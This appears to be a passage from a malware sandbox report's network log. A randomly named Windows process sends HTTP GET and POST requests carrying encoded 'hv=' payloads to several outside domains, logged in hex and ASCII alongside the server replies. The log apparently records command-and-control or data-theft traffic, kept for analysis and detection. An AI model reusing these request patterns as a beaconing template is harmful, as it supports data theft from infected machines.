                                                    Data Raw: 68 76 3d 52 52 66 47 42 58 6a 4d 6b 30 72 32 2b 68 77 41 46 78 70 34 63 65 31 49 32 59 46 7a 49 69 2f 69 4f 4a 57 71 62 2f 73 69 6e 4b 4b 4f 4d 61 33 6c 61 48 74 67 47 31 76 66 68 4b 74 58 6f 4c 31 30 5a 50 78 71 79 71 32 72 68 49 68 64 70 34 43 30 47 34 6a 6a 33 30 65 4d 57 52 68 55 51 76 45 4b 37 64 34 38 55 72 61 4d 35 31 79 71 36 5a 5a 74 66 54 70 39 56 4a 45 37 33 37 56 6d 62 77 32 2f 77 63 49 7a 64 75 4a 68 6f 67 38 39 55 70 6f 49 4d 58 73 75 6e 55 62 6c 41 33 36 78 69 34 4e 53 67 4c 37 41 6c 46 36 69 4a 31 32 76 4a 72 5a 2f 6c 50 7a 4c 56 6a 67 66 6f 2f 6b 68 4e 56 4e 30 36 4c 46 45 4d 38 51 43 69 76 4b 71 43 73 71 57 55 46 43 6c 4c 55 76 39 79 4f 6c 6a 4e 42 69 6a 73 41 4b 79 43 68 77 50 4c 47 76 57 54 5a 75 67 75 53 64 6e 6a 63 44 56 43 63 64 61 49 6f 77 36 47 46 2b 54 45 56 74 43 4e 55 6a 65 77 32 6c 57 63 48 52 41 79 62 66 42 6d 63 49 6c 31 73 63 4f 2f 42 45 77 33 54 71 54 49 77 6d 65 63 4c 51 47 6f 59 4e 54 6a 73 41 58 64 36 76 2b 2f 66 54 49 55 52 54 32 77 7a 58 70 68 68 62 30 34 2f 32 [TRUNCATED]
                                                    Data Ascii: hv=RRfGBXjMk0r2+hwAFxp4ce1I2YFzIi/iOJWqb/sinKKOMa3laHtgG1vfhKtXoL10ZPxqyq2rhIhdp4C0G4jj30eMWRhUQvEK7d48UraM51yq6ZZtfTp9VJE737Vmbw2/wcIzduJhog89UpoIMXsunUblA36xi4NSgL7AlF6iJ12vJrZ/lPzLVjgfo/khNVN06LFEM8QCivKqCsqWUFClLUv9yOljNBijsAKyChwPLGvWTZuguSdnjcDVCcdaIow6GF+TEVtCNUjew2lWcHRAybfBmcIl1scO/BEw3TqTIwmecLQGoYNTjsAXd6v+/fTIURT2wzXphhb04/2qnym/5oIVQ85v9hTo1bUjCYedE5YGTFGTsY1lch3JSex83aTb7+Qo3xBDOVjR+cRGsxV86ZsPQ90A972fspCvJYxO5chlCTdGdz5J7LPc+HUatVKwztTOEs+qeUJXucunnU9732FIZ7dpw+oUfbmUXDCqBRXl78qOlQ741sI1DHpA8NFS91zvU3DvFyoCaze7GSRTO7Q4eS0BeOEOTKukJJh014e2+rPlsWPcjSLiWXtb1wqcSHJM9AaXS9U6kolkG+JsIDB+KTJhE7ltUywRdbhXP5AR1J+BULW9zJbFkDMDT1fxnAbc9xdSPAFpvklV6jn2of+NhweUViUJcWUMxTGLnbHWzTITRvdF+ScpaGeFOkn0hcYu/QPsfLF4VqsR0vOzgt95Yntew0IfWoS3/GBfgDadbjv3SR5W8NmUEOIG6mWOrWEBAdEmPtwoWvd0C1LOMwdZVDkSDuRD3fhtOLwbqtVfs9ZLbeLqmqsoEuqiOZs/2jpV98rDBy3Eyom+at4bc1FQugjJnHLiAJt9KtoBQMSdMkJQntJK1VRFasFmTLXU6vCGNb/aqZVhgBY3p0AB5D5I6gUGkopTgw0mQJnoJ3UgV8vr4rccY9k/IYpvgWz7w9WKe9LvYn3dLk0rCPEQ4lzeyQIyvfyXQIh9g+BIetfVVgRxF [TRUNCATED]
                                                    Jul 1, 2024 15:46:42.231754065 CEST176INHTTP/1.1 405 Method Not Allowed
                                                    Server: nginx/1.20.2
                                                    Date: Mon, 01 Jul 2024 13:46:42 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 157
                                                    Via: 1.1 google
                                                    Connection: close
                                                    Jul 1, 2024 15:46:42.234688044 CEST157INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41
                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    32192.168.2.84974635.241.41.54805992C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 1, 2024 15:46:44.099317074 CEST347OUTGET /44zl/?hv=cT3mCg7Cmib/+TsqKgcGcLNa3rN7XS3dP4LITboVuuCqI7qZSFFYJV7Jt59+pqQMU8QRjoSmjIZC25OqP8KY8gmteTpLVZlDreUlLLyNnWL1wa1Nczp2K6xKprp1RRbIsA==&Sbzdb=DvgXWdN HTTP/1.1
                                                    Accept: */*
                                                    Accept-Language: en-US
                                                    Host: www.ngkwnq.xyz
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                                    Jul 1, 2024 15:46:44.742984056 CEST300INHTTP/1.1 200 OK
                                                    Server: nginx/1.20.2
                                                    Date: Mon, 01 Jul 2024 13:46:44 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 5161
                                                    Last-Modified: Mon, 15 Jan 2024 02:08:28 GMT
                                                    Vary: Accept-Encoding
                                                    ETag: "65a4939c-1429"
                                                    Cache-Control: no-cache
                                                    Accept-Ranges: bytes
                                                    Via: 1.1 google
                                                    Connection: close
                                                    Jul 1, 2024 15:46:44.756393909 CEST1236INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 7a 68 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63
                                                    Data Ascii: <!doctype html><html lang="zh"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=0"><script src="https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js" crossorigin="true
                                                    Jul 1, 2024 15:46:44.756422997 CEST1236INData Raw: 77 20 49 6d 61 67 65 29 2e 73 72 63 3d 6e 7d 66 75 6e 63 74 69 6f 6e 20 72 65 70 6f 72 74 4c 6f 61 64 69 6e 67 28 6e 29 7b 6e 3d 6e 7c 7c 7b 7d 3b 76 61 72 20 6f 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 6e 3d 28 77 69 6e 64 6f
                                                    Data Ascii: w Image).src=n}function reportLoading(n){n=n||{};var o=function(){for(var n=(window.location.search.substr(1)||"").split("&"),o={},e=0;e<n.length;e++){var r=n[e].split("=");o[r[0]]=r[1]}return function(){return o}}();function e(){var n=window.
                                                    Jul 1, 2024 15:46:44.756434917 CEST1236INData Raw: 74 72 3d 64 73 66 72 70 66 76 65 64 6e 63 70 73 73 6e 74 6e 77 62 69 70 72 65 69 6d 65 75 74 73 76 22 29 3b 28 65 28 29 7c 7c 72 28 29 29 26 26 22 61 6e 64 72 6f 69 64 22 3d 3d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 3d 77 69 6e 64 6f
                                                    Data Ascii: tr=dsfrpfvedncpssntnwbipreimeutsv");(e()||r())&&"android"===function(){var n=window.navigator.userAgent.toLowerCase();return window.ucweb?"android":n.match(/ios/i)||n.match(/ipad/i)||n.match(/iphone/i)?"iphone":n.match(/android/i)||n.match(/ap
                                                    Jul 1, 2024 15:46:44.756566048 CEST1236INData Raw: 28 22 73 72 63 22 2c 22 2f 2f 69 6d 61 67 65 2e 75 63 2e 63 6e 2f 73 2f 75 61 65 2f 67 2f 30 31 2f 77 65 6c 66 61 72 65 61 67 65 6e 63 79 2f 76 63 6f 6e 73 6f 6c 65 2e 6d 69 6e 2d 33 2e 33 2e 30 2e 6a 73 22 29 2c 24 68 65 61 64 2e 69 6e 73 65 72
                                                    Data Ascii: ("src","//image.uc.cn/s/uae/g/01/welfareagency/vconsole.min-3.3.0.js"),$head.insertBefore($script1,$head.lastChild),$script1.onload=function(){var e=document.createElement("script");e.setAttribute("crossorigin","anonymous"),e.setAttribute("src
                                                    Jul 1, 2024 15:46:44.756586075 CEST217INData Raw: e6 b2 a1 e6 9c 89 e5 b9 bf e5 91 8a 3c 2f 64 69 76 3e 3c 64 69 76 3e e7 94 b5 e5 bd b1 e6 92 ad e6 94 be e4 b8 8d e5 8d a1 e9 a1 bf 3c 2f 64 69 76 3e 3c 64 69 76 3e e7 b2 be e5 bd a9 e8 a7 86 e9 a2 91 e5 ad 98 e5 85 a5 e7 bd 91 e7 9b 98 e9 9a 8f
                                                    Data Ascii: </div><div></div><div></div></div><script src="https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.e96dc6dc6863835f4ad0.js"></script></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    33192.168.2.84974776.223.105.230805992C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 1, 2024 15:46:49.951397896 CEST617OUTPOST /jtz4/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.eoghenluire.com
                                                    Origin: http://www.eoghenluire.com
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Content-Length: 203
                                                    Connection: close
                                                    Referer: http://www.eoghenluire.com/jtz4/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                                    Data Raw: 68 76 3d 6d 33 43 77 6e 5a 48 4d 57 62 4a 46 4f 30 53 2b 32 4d 35 4f 50 4e 56 43 72 4b 6e 66 47 53 4b 78 41 56 48 37 69 30 34 62 30 6f 66 32 53 4f 63 36 46 59 5a 6b 34 74 6c 47 63 53 4c 79 71 78 43 74 35 66 6c 70 70 42 5a 65 52 35 43 48 44 30 63 54 32 57 74 54 55 4d 74 74 4d 68 42 5a 59 43 4c 67 79 53 7a 63 46 6a 6c 4f 61 32 63 6c 4f 4a 61 6a 46 6a 65 43 49 35 57 56 77 32 39 43 2b 4e 74 72 2f 2f 6e 76 5a 56 41 30 56 49 42 63 49 31 57 46 67 52 30 6a 6a 32 51 32 31 51 69 33 67 47 39 4f 76 45 4f 50 35 73 46 4c 69 6b 39 55 78 75 64 79 63 68 33 63 43 43 37 30 47 77 72 6a 5a 36 43 77 47 73 36 48 68 5a 51 3d
                                                    Data Ascii: hv=m3CwnZHMWbJFO0S+2M5OPNVCrKnfGSKxAVH7i04b0of2SOc6FYZk4tlGcSLyqxCt5flppBZeR5CHD0cT2WtTUMttMhBZYCLgySzcFjlOa2clOJajFjeCI5WVw29C+Ntr//nvZVA0VIBcI1WFgR0jj2Q21Qi3gG9OvEOP5sFLik9Uxudych3cCC70GwrjZ6CwGs6HhZQ=
                                                    Jul 1, 2024 15:46:50.428261995 CEST1236INHTTP/1.1 404 Not Found
                                                    content-type: text/html;charset=utf-8
                                                    content-length: 964
                                                    vary: Accept-Encoding
                                                    server: DPS/2.0.0-beta+sha-d033aba
                                                    x-version: d033aba
                                                    x-siteid: us-east-1
                                                    set-cookie: dps_site_id=us-east-1; path=/
                                                    date: Mon, 01 Jul 2024 13:46:50 GMT
                                                    keep-alive: timeout=5
                                                    connection: close
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 64 70 73 2f 63 73 73 2f 75 78 63 6f 72 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 64 70 73 2f 63 73 73 2f 63 75 73 74 6f 6d 65 72 2d 63 6f 6d 70 2e 63 73 [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html><html><head> <title>404 Not Found</title> <meta http-equiv="content-type" content="text/html; charset=utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <link href="//img1.wsimg.com/dps/css/uxcore.css" rel="stylesheet"> <link href="//img1.wsimg.com/dps/css/customer-comp.css" rel="stylesheet"></head><body><div id="error-img"><img src="//img1.wsimg.com/dps/images/404_background.jpg"></div><div class="container text-center" id="error"> <div class="row"> <div class="col-md-12"> <div class="main-icon text-warning"><span class="uxicon uxicon-alert"></span></div> <h1>File not found (404 error)</h1> </div> </div> <div class="row"> <div class="col-md-6 col-md-push-3"> <p class="lead">If you think what you're looking for should be here, please contact the site owner.</p> </div>
                                                    Jul 1, 2024 15:46:50.428694010 CEST36INData Raw: 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                    Data Ascii: </div></div></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    34192.168.2.84974876.223.105.230805992C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 1, 2024 15:46:52.487907887 CEST637OUTPOST /jtz4/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.eoghenluire.com
                                                    Origin: http://www.eoghenluire.com
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Content-Length: 223
                                                    Connection: close
                                                    Referer: http://www.eoghenluire.com/jtz4/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                                    Data Raw: 68 76 3d 6d 33 43 77 6e 5a 48 4d 57 62 4a 46 50 56 69 2b 36 4e 35 4f 4a 74 56 42 75 4b 6e 66 49 79 4b 31 41 56 62 37 69 78 55 79 68 4b 4c 32 53 73 55 36 43 5a 5a 6b 37 74 6c 47 54 79 4c 7a 33 42 43 36 35 65 59 57 70 42 56 65 52 35 57 48 44 78 67 54 32 6c 46 51 56 63 74 72 51 68 42 62 48 53 4c 67 79 53 7a 63 46 6a 42 33 61 31 73 6c 4f 34 71 6a 58 43 65 42 42 5a 57 55 78 32 39 43 70 39 74 76 2f 2f 6e 64 5a 55 74 52 56 4f 46 63 49 30 6d 46 75 67 30 67 34 47 51 77 36 77 6a 51 6f 30 4a 41 69 30 6d 77 7a 2b 5a 4c 72 31 64 68 39 34 77 59 47 44 2f 61 42 43 54 66 47 7a 44 56 63 4e 66 59 63 50 71 33 2f 4f 45 70 50 36 57 70 51 62 30 74 5a 72 35 49 7a 51 7a 53 4d 48 34 53
                                                    Data Ascii: hv=m3CwnZHMWbJFPVi+6N5OJtVBuKnfIyK1AVb7ixUyhKL2SsU6CZZk7tlGTyLz3BC65eYWpBVeR5WHDxgT2lFQVctrQhBbHSLgySzcFjB3a1slO4qjXCeBBZWUx29Cp9tv//ndZUtRVOFcI0mFug0g4GQw6wjQo0JAi0mwz+ZLr1dh94wYGD/aBCTfGzDVcNfYcPq3/OEpP6WpQb0tZr5IzQzSMH4S
                                                    Jul 1, 2024 15:46:52.961931944 CEST1236INHTTP/1.1 404 Not Found
                                                    content-type: text/html;charset=utf-8
                                                    content-length: 964
                                                    vary: Accept-Encoding
                                                    server: DPS/2.0.0-beta+sha-d033aba
                                                    x-version: d033aba
                                                    x-siteid: us-east-1
                                                    set-cookie: dps_site_id=us-east-1; path=/
                                                    date: Mon, 01 Jul 2024 13:46:52 GMT
                                                    keep-alive: timeout=5
                                                    connection: close
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 64 70 73 2f 63 73 73 2f 75 78 63 6f 72 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 64 70 73 2f 63 73 73 2f 63 75 73 74 6f 6d 65 72 2d 63 6f 6d 70 2e 63 73 [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html><html><head> <title>404 Not Found</title> <meta http-equiv="content-type" content="text/html; charset=utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <link href="//img1.wsimg.com/dps/css/uxcore.css" rel="stylesheet"> <link href="//img1.wsimg.com/dps/css/customer-comp.css" rel="stylesheet"></head><body><div id="error-img"><img src="//img1.wsimg.com/dps/images/404_background.jpg"></div><div class="container text-center" id="error"> <div class="row"> <div class="col-md-12"> <div class="main-icon text-warning"><span class="uxicon uxicon-alert"></span></div> <h1>File not found (404 error)</h1> </div> </div> <div class="row"> <div class="col-md-6 col-md-push-3"> <p class="lead">If you think what you're looking for should be here, please contact the site owner.</p> </div>
                                                    Jul 1, 2024 15:46:52.961945057 CEST36INData Raw: 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                    Data Ascii: </div></div></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    35192.168.2.84974976.223.105.230805992C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 1, 2024 15:46:55.017518044 CEST1654OUTPOST /jtz4/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.eoghenluire.com
                                                    Origin: http://www.eoghenluire.com
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Content-Length: 1239
                                                    Connection: close
                                                    Referer: http://www.eoghenluire.com/jtz4/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                                    Data Raw: 68 76 3d 6d 33 43 77 6e 5a 48 4d 57 62 4a 46 50 56 69 2b 36 4e 35 4f 4a 74 56 42 75 4b 6e 66 49 79 4b 31 41 56 62 37 69 78 55 79 68 4b 54 32 53 66 4d 36 43 36 68 6b 36 74 6c 47 61 53 4c 32 33 42 43 37 35 65 42 66 70 42 49 38 52 37 75 48 43 58 30 54 77 55 46 51 4d 4d 74 72 49 68 42 57 59 43 4c 31 79 53 6a 51 46 6a 52 33 61 31 73 6c 4f 37 79 6a 42 6a 65 42 48 5a 57 56 77 32 39 57 2b 4e 74 44 2f 37 44 4e 5a 55 5a 72 41 76 35 63 4a 55 32 46 73 53 73 67 30 47 51 79 75 51 6a 49 6f 30 55 43 69 30 71 38 7a 2f 73 73 72 32 4e 68 34 5a 46 5a 57 52 50 33 58 53 48 75 47 44 54 55 51 74 43 30 5a 66 2b 78 79 5a 30 70 4a 38 4f 46 65 4b 55 56 63 36 6f 36 6e 52 50 6b 42 44 6b 65 6e 59 63 66 7a 4f 4d 61 43 76 31 5a 66 38 78 73 71 49 2b 58 6b 76 46 30 61 55 65 30 31 56 41 69 46 7a 47 76 51 47 34 4b 63 52 70 6d 2f 42 30 43 62 7a 50 75 4e 66 34 55 79 49 6a 31 36 76 57 6b 2b 33 78 56 71 62 48 69 73 5a 4c 6a 2b 6e 77 4b 4f 50 49 54 55 66 36 49 68 65 66 67 53 55 39 58 41 48 52 73 53 35 65 39 7a 72 72 42 68 6a 33 42 73 66 5a [TRUNCATED]
                                                    Data Ascii: hv=m3CwnZHMWbJFPVi+6N5OJtVBuKnfIyK1AVb7ixUyhKT2SfM6C6hk6tlGaSL23BC75eBfpBI8R7uHCX0TwUFQMMtrIhBWYCL1ySjQFjR3a1slO7yjBjeBHZWVw29W+NtD/7DNZUZrAv5cJU2FsSsg0GQyuQjIo0UCi0q8z/ssr2Nh4ZFZWRP3XSHuGDTUQtC0Zf+xyZ0pJ8OFeKUVc6o6nRPkBDkenYcfzOMaCv1Zf8xsqI+XkvF0aUe01VAiFzGvQG4KcRpm/B0CbzPuNf4UyIj16vWk+3xVqbHisZLj+nwKOPITUf6IhefgSU9XAHRsS5e9zrrBhj3BsfZdgdOsMfLqBkyztzP4UKKqiCT9Fcbw0jbUk0UerP72iG9pDYi8nZNWPJ+pYhuXlAEkx6Cz5DceNCOyPATouNSaSpFX10FtN5d6nn9OsBuSY3iJDSI83LlMNBUeq2OhrLqGA9wOQGQXQKrwynZjcxYcZwgviI8X7alSp0DAbDf+q22bysWhuDaMHAbXNPGcxsNa7zAsrlI9Qo2pILQyFOitL2FysHG7kGUNFsJDOAwLAyCK4uirZ5JWcfJZdZWX71VogGzztCy57nIHUjJU7KgxMUt+VII6C7vpA9QnDLBWCW5suClWg16zfp16C1rG+77/KO2gFX9tm6+o3+mi/98hUVes79fRGWLiglOSQevkraQVvw0GrTqZWmA5oO3z8LadZZ3PZ+Nj/ok1KzWGUmiqdNeUyrGQXGcPd+EZvt5wqJXN69rk1LW/5Nu7Ut4v+HA7DewnzAFDWgSE9p5RKoYF7J3alf4Tist4QXO+d1pdlvuZjEhyMdJC/mq2DzK1TQ0JH1QT+yaaTtJdMGvv2MiRRQOeCBg3tXgVtbWH5AZQ0OR41kWIj5TUfTSKIMgw2qZHCWKZgXLHiAVQiYW26HA66njUSZ/ddQpiKksSiMwA3nvIZaCPnXhjGDEz5TFJN2YmtjC7b6Jyz72mdze/TbFjuQ118+HYNtJ3P [TRUNCATED]
                                                    Jul 1, 2024 15:46:56.093729973 CEST1236INHTTP/1.1 404 Not Found
                                                    content-type: text/html;charset=utf-8
                                                    content-length: 964
                                                    vary: Accept-Encoding
                                                    server: DPS/2.0.0-beta+sha-d033aba
                                                    x-version: d033aba
                                                    x-siteid: us-east-1
                                                    set-cookie: dps_site_id=us-east-1; path=/
                                                    date: Mon, 01 Jul 2024 13:46:55 GMT
                                                    keep-alive: timeout=5
                                                    connection: close
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 64 70 73 2f 63 73 73 2f 75 78 63 6f 72 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 64 70 73 2f 63 73 73 2f 63 75 73 74 6f 6d 65 72 2d 63 6f 6d 70 2e 63 73 [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html><html><head> <title>404 Not Found</title> <meta http-equiv="content-type" content="text/html; charset=utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <link href="//img1.wsimg.com/dps/css/uxcore.css" rel="stylesheet"> <link href="//img1.wsimg.com/dps/css/customer-comp.css" rel="stylesheet"></head><body><div id="error-img"><img src="//img1.wsimg.com/dps/images/404_background.jpg"></div><div class="container text-center" id="error"> <div class="row"> <div class="col-md-12"> <div class="main-icon text-warning"><span class="uxicon uxicon-alert"></span></div> <h1>File not found (404 error)</h1> </div> </div> <div class="row"> <div class="col-md-6 col-md-push-3"> <p class="lead">If you think what you're looking for should be here, please contact the site owner.</p> </div>
                                                    Jul 1, 2024 15:46:56.093740940 CEST36INData Raw: 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                    Data Ascii: </div></div></body></html>
                                                    Jul 1, 2024 15:46:56.094387054 CEST1236INHTTP/1.1 404 Not Found
                                                    content-type: text/html;charset=utf-8
                                                    content-length: 964
                                                    vary: Accept-Encoding
                                                    server: DPS/2.0.0-beta+sha-d033aba
                                                    x-version: d033aba
                                                    x-siteid: us-east-1
                                                    set-cookie: dps_site_id=us-east-1; path=/
                                                    date: Mon, 01 Jul 2024 13:46:55 GMT
                                                    keep-alive: timeout=5
                                                    connection: close
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 64 70 73 2f 63 73 73 2f 75 78 63 6f 72 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 64 70 73 2f 63 73 73 2f 63 75 73 74 6f 6d 65 72 2d 63 6f 6d 70 2e 63 73 [TRUNCATED]
